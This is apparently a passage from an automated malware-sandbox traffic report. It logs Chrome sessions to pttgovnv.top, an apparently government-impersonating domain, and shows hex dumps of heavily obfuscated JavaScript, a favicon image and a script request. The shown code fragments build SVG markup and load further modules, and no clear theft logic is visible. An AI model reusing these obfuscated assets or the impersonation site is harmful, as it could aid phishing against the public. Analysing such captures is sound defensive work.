          Data Ascii: 22\x20values'+_0x1457f1(0x5be)+_0x1457f1(0x663)+'\x22\x20dur=\x221s\x22'+'\x20begin=\x22-0'+_0x1457f1(0x3ff)+_0x1457f1(0x457)+'repeatCoun'+'t=\x22indefin'+_0x1457f1(0x1f2)+_0x1457f1(0x3fe)+_0x1457f1(0x384)+_0x1457f1(0x183)+'m=\x22rotate('+_0x1457f1(0x544)
          2024-09-01 22:25:17 UTC1369INData Raw: 31 28 30 78 33 36 38 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 30 38 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 66 61 29 2b 27 69 67 68 74 3d 5c 78 32 32 31 32 5c 78 32 32 5c 78 32 30 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 31 35 37 29 29 2b 28 5f 30 78 66 33 32 30 35 30 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 78 30 3a 5f 30 78 66 33 32 30 35 30 5b 5f 30 78 31 34 35 37 66 31 28 30 78 34 61 65 29 2b 27 74 65 27 5d 28 5f 30 78 31 34 35 37 66 31 28 30 78 35 62 63 29 29 29 2b 28 5f 30 78 31 34 35 37 66 31 28 30 78 32 36 32 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 66 32 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 37 64 29 2b 27 61 6d 65 3d 5c 78 32 32 6f 70 61 63 69 27 2b 27 74 79 5c 78 32 32 5c 78 32 30 76 61 6c 75 65 73 27 2b 5f 30 78 31 34 35 37
          Data Ascii: 1(0x368)+_0x1457f1(0x408)+_0x1457f1(0x3fa)+'ight=\x2212\x22\x20'+_0x1457f1(0x157))+(_0xf32050==null?void 0x0:_0xf32050[_0x1457f1(0x4ae)+'te'](_0x1457f1(0x5bc)))+(_0x1457f1(0x262)+_0x1457f1(0x4f2)+_0x1457f1(0x27d)+'ame=\x22opaci'+'ty\x22\x20values'+_0x1457
          2024-09-01 22:25:17 UTC1369INData Raw: 30 6b 65 79 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 36 33 29 2b 27 5c 78 32 32 5c 78 32 30 64 75 72 3d 5c 78 32 32 31 73 5c 78 32 32 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 30 30 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 37 64 29 2b 27 74 43 6f 75 6e 74 3d 5c 78 32 32 69 6e 27 2b 27 64 65 66 69 6e 69 74 65 5c 78 32 32 2f 27 2b 27 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 27 2b 27 72 65 63 74 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 30 36 29 2b 27 6e 73 66 6f 72 6d 3d 5c 78 32 32 72 6f 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 36 61 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 65 63 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78
          Data Ascii: 0key'+_0x1457f1(0x663)+'\x22\x20dur=\x221s\x22'+_0x1457f1(0x600)+_0x1457f1(0x67d)+'tCount=\x22in'+'definite\x22/'+'>\x0a\x20\x20\x20\x20\x20\x20</'+'rect>\x0a\x20\x20\x20\x20'+_0x1457f1(0x206)+'nsform=\x22ro'+_0x1457f1(0x46a)+_0x1457f1(0x6ec)+_0x1457f1(0x
          2024-09-01 22:25:17 UTC1369INData Raw: 31 34 35 37 66 31 28 30 78 31 37 66 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 64 36 29 2b 27 5c 78 32 32 5c 78 32 30 79 3d 5c 78 32 32 32 34 5c 78 32 32 5c 78 32 30 72 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 34 65 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 33 64 29 2b 27 36 5c 78 32 32 5c 78 32 30 68 65 69 67 68 74 3d 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 39 32 29 2b 27 5c 78 32 32 27 29 2b 28 5f 30 78 66 33 32 30 35 30 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 78 30 3a 5f 30 78 66 33 32 30 35 30 5b 5f 30 78 31 34 35 37 66 31 28 30 78 34 61 65 29 2b 27 74 65 27 5d 28 5f 30 78 31 34 35 37 66 31 28 30 78 35 62 63 29 29 29 2b 28 5f 30 78 31 34 35 37 66 31 28 30 78 32 36 32 29 2b 27 5c 78 32 30 3c 61 6e 69 6d 61 74 65 5c 78 32 30 27 2b 27 61 74
          Data Ascii: 1457f1(0x17f)+_0x1457f1(0x6d6)+'\x22\x20y=\x2224\x22\x20r'+_0x1457f1(0x44e)+_0x1457f1(0x63d)+'6\x22\x20height='+_0x1457f1(0x692)+'\x22')+(_0xf32050==null?void 0x0:_0xf32050[_0x1457f1(0x4ae)+'te'](_0x1457f1(0x5bc)))+(_0x1457f1(0x262)+'\x20<animate\x20'+'at
          2024-09-01 22:25:17 UTC1369INData Raw: 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 65 62 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 62 65 29 2b 27 54 69 6d 65 73 3d 5c 78 32 32 30 3b 31 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 34 35 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 30 30 29 2b 27 2e 30 38 33 33 33 33 33 33 33 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 34 62 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 62 38 29 2b 27 6e 74 3d 5c 78 32 32 69 6e 64 65 66 69 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 39 34 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 32 65 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 39 31 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 33 66 29 2b 27 72 6d 3d 5c 78 32 32 72 6f 74 61 74 65 27 2b 27 28 33 33 30 5c 78 32 30 35 30 5c 78 32 30 35 30 27 2b 27 29 5c 78
          Data Ascii: +_0x1457f1(0x5eb)+_0x1457f1(0x5be)+'Times=\x220;1'+_0x1457f1(0x245)+_0x1457f1(0x600)+'.083333333'+_0x1457f1(0x54b)+_0x1457f1(0x3b8)+'nt=\x22indefi'+_0x1457f1(0x494)+_0x1457f1(0x42e)+_0x1457f1(0x291)+_0x1457f1(0x53f)+'rm=\x22rotate'+'(330\x2050\x2050'+')\x


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          15192.168.2.449753104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:17 UTC347OUTGET /favicon.ico HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:17 UTC743INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:17 GMT
          Content-Type: image/vnd.microsoft.icon
          Content-Length: 15215
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"3b6f-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 37494
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c23f%2FF3HBT%2BMiRs4m1AgI7HKqAS3YYVKuo3IYKxU2iGPCjpk9PTK8SSDm0U4jRK2mO5cWfZ%2BNmUumNSwvndnqG2v%2FVaey1%2B2B3urouGjW5jvv0vzU5f6QDMVbSKsO1U%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ace248b91a24-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:17 UTC626INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 4e 00 00 01 5f 08 06 00 00 00 b8 3b 43 56 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 21 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 32 30 31 38 3a 30 39 3a 30 37 20 30 39 3a 31 36 3a 30 36 44 2f 69 55 00 00 3a b2 49 44 41 54 78 5e ed dd cf 76 54 c7 d5 f7 f1 aa d3 b6 61 f6 38 57 00 99 07 68 0d 13 c8 8a 7c 05 96 27 59 30 8a 7c 05 b4 af c0 e2 0a 10 57 60 79 84 56 26 16 57 e0 f6 0a 24 43 35 90 79 c4 15 bc 78 06 d8 7d ea ad 5d 55 2d 09 a1 3f 7d fe 57 d5 f9 7e d6 b2 e1 b4
          Data Ascii: PNGIHDRN_;CVsRGBgAMAapHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<!tEXtCreation Time2018:09:07 09:16:06D/iU:IDATx^vTa8Wh|'Y0|W`yV&W$C5yx}]U-?}W~
          2024-09-01 22:25:17 UTC1369INData Raw: 2a 94 59 a8 62 b2 a0 c9 1c 00 e2 41 70 02 6a aa db ef 54 95 ab 4a 29 bd 20 4c 01 c0 f0 08 4e 40 03 e6 c5 9f b6 8c 2a 7e 0a 97 bd f2 95 29 65 03 94 39 2a ca 62 ae 7e 57 0b 1a cf 01 a0 5b 04 27 a0 a1 75 e6 3b f5 e9 93 40 f5 99 3a a2 42 05 00 ed 20 38 01 2d 58 be b8 7d 60 3f 4c 5f 87 cb 28 85 40 f5 d6 fe 6e e1 96 fc ca c9 5b fd d7 97 f3 f0 8f 01 00 6b 20 38 01 2d e8 b2 59 bc 6b ee b8 18 a5 8f a4 87 4a db 60 a5 97 c5 82 65 3f 00 38 1f c1 09 68 49 5f cd e2 7d 39 6e 4a 57 36 44 15 e6 88 40 05 00 04 27 a0 55 72 18 70 a9 ca 79 2e e1 e9 3c 04 2a 00 63 46 70 02 5a d6 74 b2 78 aa 3e 1a 9b 60 a4 39 bd 58 30 d0 13 40 6e 08 4e 40 07 c6 1a 9e ce e3 8f 98 51 36 40 31 36 01 40 fa 08 4e 40 47 da 3a 96 25 47 ae 21 5d cb 72 9f 59 10 a6 00 a4 84 e0 04 74 88 f0 b4 3e c2 14 80
          Data Ascii: *YbApjTJ) LN@*~)e9*b~W['u;@:B 8-X}`?L_(@n[k 8-YkJ`e?8hI_}9nJW6D@'Urpy.<*cFpZtx>`9X0@nN@Q6@16@N@G:%G!]rYt>
          2024-09-01 22:25:17 UTC1369INData Raw: 85 52 7a af 98 e8 5d 76 e4 21 27 04 27 00 ad 56 9f 44 aa 01 4a b8 7e a8 a5 99 d9 df 49 3f 14 4b 79 2d 70 15 49 5d ee 72 d8 30 72 40 70 02 e0 b4 5d 7d 12 f6 86 f9 a4 f8 cd 06 a8 44 97 6c 58 ca 6b 97 6c 2a d0 85 da d5 ef 8b 3d 96 f1 90 2a 82 13 80 8f b4 5e 7d 5a cd 80 4a 78 88 e2 f1 52 5e a9 66 f6 e7 c2 ae bc 86 8e 9b c9 13 ad 4a 62 dc 08 4e 00 3e d1 45 f5 49 a4 bc 84 b7 c2 ae bc 76 d9 f7 c4 b3 a2 d4 bb 1c ef 82 54 10 9c 00 5c 28 54 9f 76 db ae b2 e4 70 b3 94 70 e9 06 6c 2a bd dd 64 2a 3b 3c fb 9e 70 bb f1 98 4c 8e d8 11 9c 00 5c ca 55 9f 3e 37 3b 4d 0e 0c be 48 2e 4d c3 34 94 b7 87 3e 28 c4 8e e0 04 60 2d 61 89 4a 96 ef 5a df ae 2f 37 cb 54 8e 72 b9 8a 79 7e 6b 9b 2a 54 73 c7 bd 71 91 9f 8f 88 f1 21 38 01 a8 a4 fc f7 ad 99 29 6d c8 e9 a0 b2 22 01 ca 7e 2b
          Data Ascii: Rz]v!''VDJ~I?Ky-pI]r0r@p]}DlXkl*=*^}ZJxR^fJbN>EIvT\(Tvppl*d*;<pL\U>7;MH.M4>(`-aJZ/7Try~k*Tsq!8)m"~+
          2024-09-01 22:25:17 UTC1369INData Raw: 3a 3c b9 ad d8 23 3f 28 d6 fe 0c de 4c ee bd be 19 2e 71 0a 01 ea 04 bb ee f2 42 70 02 32 d6 e5 f1 2c ae cf 47 9b 6d 65 f4 97 a5 d6 5b f6 cb a4 f3 63 50 62 34 f6 5d 76 57 21 40 79 ae ef c9 d8 f0 c4 71 2d c9 23 38 01 99 eb 3c 3c a9 62 73 75 33 08 c7 75 6c d9 6f 96 4d fb e5 32 8a 43 63 a9 3a ad 87 00 15 3e 2f 8c 2c 48 1e c1 09 18 81 70 38 ee bc 8b 30 73 36 3c ad c8 ff 9f ea 8b e5 66 a9 f4 54 19 bd 99 f3 d9 67 54 9d d6 e7 83 bc d9 1d f3 59 78 bc 5f d2 46 70 02 46 c2 85 a7 cf cd 41 57 37 ac 75 6e 06 72 d3 54 aa b4 37 4e 1b a6 94 b2 7f 99 69 aa 7d 52 ee 20 62 ad 8e b4 36 0b ad 8b 03 b6 9e 57 33 f6 c3 84 99 f7 94 2e 82 13 30 32 cb 17 b7 f7 ba 5a 2e a9 f3 24 ed 2a 53 9f a9 a9 99 94 53 7b 33 f9 52 aa 53 f2 7a 0c 37 54 17 8e 84 36 6e 69 a5 28 8b b9 fd b3 1e 11 92
          Data Ascii: :<#?(L.qBp2,Gme[cPb4]vW!@yq-#8<<bsu3uloM2Cc:>/,Hp80s6<fTgTYx_FpFAW7unrT7Ni}R b6W3.02Z.$*SS{3RSz7T6ni(
          2024-09-01 22:25:17 UTC1369INData Raw: ac 2a 11 2e 3c 7d 5e 2e 2e 5b ee 0a b3 94 16 85 2e e7 aa 98 2c 62 0e 13 e6 c5 9f b6 4a a3 e5 60 d6 c6 c1 d9 2d 55 68 b3 4d 9f 07 aa 58 55 72 c3 65 f2 8c 52 2f 27 77 5f b1 39 a6 43 04 27 f4 4b fa 98 de 2b 59 96 7b 18 5e e9 90 79 a2 ee 6f cc c2 45 36 64 4b be ec 2e 5b 77 a9 eb 6c 55 4a fd ae 16 31 f5 41 f8 4a 5a 39 6b 6b f9 4e 96 32 8b 0f 7a 9b 5e 0f ac e3 bc 4a 6e ea 64 f7 a0 ec 22 0c 97 68 19 c1 09 fd d9 3f 94 86 4c 19 62 d9 5e 1f d3 65 32 1e 82 59 35 3c 9d 25 8d d5 36 4c 2d ec ef 16 85 fd 2b 86 ca 94 5b be 2b dd ee bb c6 e7 0e ca bf 5f 61 8a 6d 96 2c b0 0e bf 74 ec 2a b9 fd 7c 37 75 cc 55 5f 69 14 ef 0c c1 09 dd 93 63 52 b4 96 a7 9f 0e fa 98 2e f5 46 dd 9f 66 7b f4 8a ec 52 33 85 f9 39 5c 36 e6 2a 53 32 68 54 96 f9 24 4c 99 e2 68 88 e0 e1 76 df 15 2e 40
          Data Ascii: *.<}^..[.,bJ`-UhMXUreR/'w_9C'K+Y{^yoE6dK.[wlUJ1AJZ9kkN2z^Jnd"h?Lb^e2Y5<%6L-+[+_am,t*|7uU_icR.Ff{R39\6*S2hT$Lhv.@
          2024-09-01 22:25:17 UTC1369INData Raw: d8 e0 50 13 c1 29 57 d2 c7 a4 b5 2c 1b 7c ed 5f 80 fd ba 78 62 83 13 5f 16 97 90 10 53 7e 61 76 ed 17 43 6b 3b 2c 8d 32 8f a4 a1 36 5c ae cd 2d f1 fd ae 6e 9a 49 39 b5 5f f4 5f da af ab a9 fd 1f b3 bf 1a 1b ac ba ab 52 f9 e6 76 ed cf f4 d2 c6 85 a2 a2 2c e6 f6 db f2 2d 67 7d e1 34 57 3d d5 e6 30 5c 26 c3 7e 9e 7e b1 c1 89 5e a7 9a 08 4e b9 71 f3 98 d4 cc 86 a6 ef c3 2b 58 31 ea a5 7a 30 a5 49 7c 0d 6e bb bd d1 8f c3 65 63 d2 84 3e b9 fb 6a 3b 5c b6 c6 ed 6a 73 61 2a d0 e5 cd 52 ab 2b 7b d9 b4 84 a0 65 f1 51 08 a2 72 84 3a 64 73 40 9b 0f 1a 7d 29 ee be e2 fe 5f 13 3f b8 9c 3c 3d b4 37 26 37 c4 72 bc 7d 4c 57 b9 3f e5 3d bf a6 b6 fb 9e e4 29 b7 f8 4d 6f d1 03 84 9c a4 da eb 24 c7 30 51 41 ad 87 71 04 39 90 3e a6 a7 0b 39 57 ee 07 42 d3 15 e4 67 85 b5 48 05
          Data Ascii: P)W,|_xb_S~avCk;,26\-nI9__Rv,-g}4W=0\&~~^Nq+X1z0I|nec>j;\jsa*R+{eQr:ds@})_?<=7&7r}LW?=)Mo$0QAq9>9WBgH
          2024-09-01 22:25:17 UTC1369INData Raw: a9 a6 33 cb 3a 53 4e a8 ba d6 40 c5 69 1d 72 a6 d9 52 ef da 9f 16 13 bf 73 c6 72 5d 92 8e ab 50 46 6f db 2f b4 da e3 3f 8e ab 50 f6 2f 7d ef 25 4d b3 68 cd f2 c5 ad 1d ad e2 db 38 a4 3f e8 3f 44 b1 64 bd 7f b8 a5 ee 6f 24 53 f9 22 38 5d c6 2d cb b9 c0 44 1f d3 18 b0 5c 97 3c f3 fc ce b4 54 66 db fe 4e 7a a1 ea 2f e5 29 f5 52 66 f0 c8 f4 67 96 f2 d0 94 ec ec 94 4d 0a e1 32 1a c5 dd 57 71 64 80 a7 8b b7 6a 62 36 d5 df 37 92 78 60 21 38 5d e4 e9 e1 8e fd f1 d0 c7 34 2e cf d4 fd 29 4b 76 99 20 44 21 26 b1 f5 39 c9 f2 a1 ec 5c 0d 97 c3 da 5f 18 fb 41 7b a9 1e 4c 93 38 74 98 e0 74 96 94 0c 95 de b5 bf 6b 34 80 0f 89 32 e6 8f ea c1 06 37 c7 cc b4 19 a2 ec df 0f 0a 63 43 14 cb 79 a8 40 7a e9 64 3c 46 b8 1c 9c f4 07 4e ee be 1a be b7 4f 56 76 de eb ff e7 2f cc 77
          Data Ascii: 3:SN@irRsr]PFo/?P/}%Mh8??Ddo$S"8]-D\<TfNz/)RfgM2Wqdjb67x`!8]4.)Kv D!&9\_A{L8ttk427cCy@zd<FNOVv/w
          2024-09-01 22:25:17 UTC1369INData Raw: c3 12 b3 a9 3a 6d 31 9a 00 40 1b dc 61 cf 3d 32 f6 01 36 c2 a9 f2 d5 2b 4e c7 86 9d ed 14 67 70 92 3e 26 7f 74 07 7d 4c 75 ac 1a bf ef 4f b7 ba 69 fc ae 20 97 aa 93 1f 4d 40 af 13 80 16 d8 fb 5b 8f 8a d8 46 c4 54 6d 0c ff d4 8d 21 bf 8f e3 0a 4e b2 7b 49 4e d8 a7 8f a9 2e 99 f8 fd 6d e7 8d df 95 e5 52 75 a2 49 1c 40 5a 8c 31 bf ea 7b af 63 9b ad d7 7c a7 b2 e4 04 69 e5 19 40 1c c1 c9 8f 17 90 79 4c 72 66 0d 7d 4c 55 f9 89 df 8f c2 c4 ef d8 3e 20 ab aa 53 fa d3 c4 25 cc bb 43 a3 01 a0 01 6d fa 7b b0 d5 2a 9a f9 47 c7 ea ec a8 3b cf 72 98 46 f1 61 83 93 ac 51 ee 1f ee da c0 f4 3f fb 83 a4 8f a9 0e 09 24 7e e2 77 e4 55 9d 5c e6 3a d1 24 0e 20 1d f1 35 85 5b a6 76 63 f8 c7 24 37 0c f0 30 3b 5c 70 92 41 56 d2 c7 24 a3 d4 51 9d ef 63 fa a3 1b 60 39 58 e3 77 05
          Data Ascii: :m1@a=26+Ngp>&t}LuOi M@[FTm!N{IN.mRuI@Z1{c|i@yLrf}LU> S%Cm{*G;rFaQ?$~wU\:$ 5[vc$70;\pAV$Qc`9Xw
          2024-09-01 22:25:17 UTC1369INData Raw: 5b 22 83 76 63 d8 4d 77 91 86 df cb 27 bb ea 56 e1 09 9e 84 48 69 fc be e6 d6 43 59 72 19 4a ea 67 d9 49 69 b8 c3 c3 26 01 a4 c7 fc e7 4e ad fe 24 59 a2 8b 7f 66 53 b0 8c f8 c0 e1 86 df cb 1f cf 71 92 f0 24 d5 95 b1 93 c6 6f df 40 b6 43 1f 53 04 ae b9 aa d3 1b 7f 91 22 fd b0 cd 19 22 00 12 f7 bb aa 1c 9c d2 5a a2 73 22 6f 53 a8 7f 08 f0 a7 03 30 a5 ba 32 d6 f0 24 cd c8 85 d9 70 8d df f4 31 c5 43 c2 6b 61 d2 ee 15 92 19 22 2c d9 01 a8 21 a9 25 3a 31 d4 d9 74 55 2d 55 ad c2 c8 a7 c1 49 8c 31 3c 49 f3 b7 34 7e 4b d5 0d f1 71 ff 5d cc 77 e1 2a 45 37 58 b2 03 50 47 a1 8a ad 64 96 e8 9c 04 06 73 4a a1 a4 66 81 e4 fc e0 24 c6 16 9e b4 ba e3 ce e7 43 bc 92 1f 51 c0 92 1d 00 4b 97 6b 2f d5 b9 41 97 f7 5e a6 f3 40 ef 2b eb 5f fb 8b 98 99 96 7a 9c ce 72 4d d1 e6 1b
          Data Ascii: ["vcMw'VHiCYrJgIi&N$YfSq$o@CS""Zs"oS02$p1Cka",!%:1tU-UI1<I4~Kq]w*E7XPGdsJf$CQKk/A^@+_zrM
          2024-09-01 22:25:17 UTC1369INData Raw: 72 e6 fa 6a f4 4f 34 fa 46 42 fa 85 52 ac 3c 31 e3 09 40 1f e4 3b 46 47 58 6d 72 59 c1 0c 72 ba 42 3c c1 49 3c d8 98 db 1f c4 48 26 8d eb c7 ec b8 8b 44 ba e1 89 73 12 01 74 eb 9d 92 87 fc 1b fe 22 26 66 66 bf bb 07 19 28 1a cf 52 dd 69 7e 58 e1 ae fd d3 e5 3f 2c 53 42 a2 4c 56 67 c7 dd f0 d2 5d b6 e3 3d 04 a0 7d f1 0e bb 7c a6 ee 4f 07 3b cb 33 ae 8a d3 8a 6f 1a 1f c7 b0 4c 0e 08 8e 07 95 27 00 38 45 c7 b8 2a f2 c6 1d a3 35 a0 38 83 d3 8a f4 3d 15 66 23 fb be a7 d5 01 c1 52 f1 c0 b0 08 4f 00 20 1b b6 b6 ec f7 ca df c2 55 3c 8a e1 67 22 c6 1d 9c c4 c9 bc a7 5f c2 2b 79 92 66 5f 8e 69 89 03 e1 09 c0 98 b9 ef 10 bd 1b ae e2 31 c0 e8 81 f3 c4 d9 e3 74 11 09 15 72 8c 49 fe 9e b9 52 24 3d 2b c3 a2 e7 09 c0 18 ed 1f da d0 a4 1f 86 ab 58 0c da d7 74 5a 5a c1 49
          Data Ascii: rjO4FBR<1@;FGXmrYrB<I<H&Dst"&ff(Ri~X?,SBLVg]=}|O;3oL'8E*58=f#RO U<g"_+yf_i1trIR$=+XtZZI


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          16192.168.2.449755104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:17 UTC364OUTGET /help/assets/77985128JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:17 UTC758INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:17 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"1264-18fc3d84650"
          CF-Cache-Status: HIT
          Age: 34171
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3E3TXDhqwEewqoGCwheddgMDTVOIDJOEjNl60LH0M0r3gzWPw4msPBV%2BHhocBo33Fr%2FJTuwXQGStmos7EIeFFGZsktdwyqFnHLxI2vvJwg%2FUqvnaR8pKTm6dWCN1JbQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ace24e2e4263-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:17 UTC611INData Raw: 31 32 36 34 0d 0a 63 6f 6e 73 74 20 61 31 36 5f 30 78 31 61 30 61 62 31 3d 61 31 36 5f 30 78 62 33 30 39 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 63 36 32 30 32 37 2c 5f 30 78 34 63 33 35 30 33 29 7b 63 6f 6e 73 74 20 5f 30 78 34 37 32 35 31 37 3d 61 31 36 5f 30 78 62 33 30 39 2c 5f 30 78 31 38 66 32 38 38 3d 5f 30 78 63 36 32 30 32 37 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 30 61 36 34 62 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 34 62 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 33 66 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 32 64 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78
          Data Ascii: 1264const a16_0x1a0ab1=a16_0xb309;(function(_0xc62027,_0x4c3503){const _0x472517=a16_0xb309,_0x18f288=_0xc62027();while(!![]){try{const _0x10a64b=parseInt(_0x472517(0x14b))/0x1+-parseInt(_0x472517(0x13f))/0x2+parseInt(_0x472517(0x12d))/0x3+-parseInt(_0x
          2024-09-01 22:25:17 UTC1369INData Raw: 34 36 38 31 2c 30 78 36 65 62 66 36 29 29 3b 63 6f 6e 73 74 20 61 31 36 5f 30 78 61 61 35 39 66 37 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 5f 30 78 34 31 30 62 64 31 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 65 35 63 30 37 2c 5f 30 78 33 31 63 63 34 35 29 7b 63 6f 6e 73 74 20 5f 30 78 35 63 32 31 65 37 3d 5f 30 78 34 31 30 62 64 31 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 61 61 36 61 36 3d 61 31 36 5f 30 78 62 33 30 39 3b 69 66 28 5f 30 78 33 31 63 63 34 35 29 7b 63 6f 6e 73 74 20 5f 30 78 32 31 66 34 32 38 3d 5f 30 78 33 31 63 63 34 35 5b 5f 30 78 33 61 61 36 61 36 28 30 78 31 32 34 29 5d 28 5f 30 78 33 65 35 63 30 37 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78
          Data Ascii: 4681,0x6ebf6));const a16_0xaa59f7=(function(){let _0x410bd1=!![];return function(_0x3e5c07,_0x31cc45){const _0x5c21e7=_0x410bd1?function(){const _0x3aa6a6=a16_0xb309;if(_0x31cc45){const _0x21f428=_0x31cc45[_0x3aa6a6(0x124)](_0x3e5c07,arguments);return _0x
          2024-09-01 22:25:17 UTC1369INData Raw: 20 61 31 36 5f 30 78 31 34 61 66 66 62 2c 62 20 61 73 20 61 31 36 5f 30 78 31 39 63 39 36 38 7d 66 72 6f 6d 27 2e 2f 33 37 64 38 65 62 33 31 4a 78 4b 6e 57 2e 6a 73 27 3b 63 6f 6e 73 74 20 6f 3d 64 6f 63 75 6d 65 6e 74 5b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 35 31 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 64 29 5d 28 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 64 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 36 29 29 3b 66 75 6e 63 74 69 6f 6e 20 61 31 36 5f 30 78 62 33 30 39 28 5f 30 78 31 31 63 64 63 35 2c 5f 30 78 33 33 66 61 37 61 29 7b 63 6f 6e 73 74 20 5f 30 78 31 31 38 66 33 63 3d 61 31 36 5f 30 78 34 36 38 31 28 29 3b 72 65 74 75 72 6e 20 61 31 36 5f 30 78 62 33 30 39 3d 66 75 6e 63 74 69 6f 6e 28 5f 30
          Data Ascii: a16_0x14affb,b as a16_0x19c968}from'./37d8eb31JxKnW.js';const o=document[a16_0x1a0ab1(0x151)+a16_0x1a0ab1(0x14d)](a16_0x1a0ab1(0x13d)+a16_0x1a0ab1(0x136));function a16_0xb309(_0x11cdc5,_0x33fa7a){const _0x118f3c=a16_0x4681();return a16_0xb309=function(_0
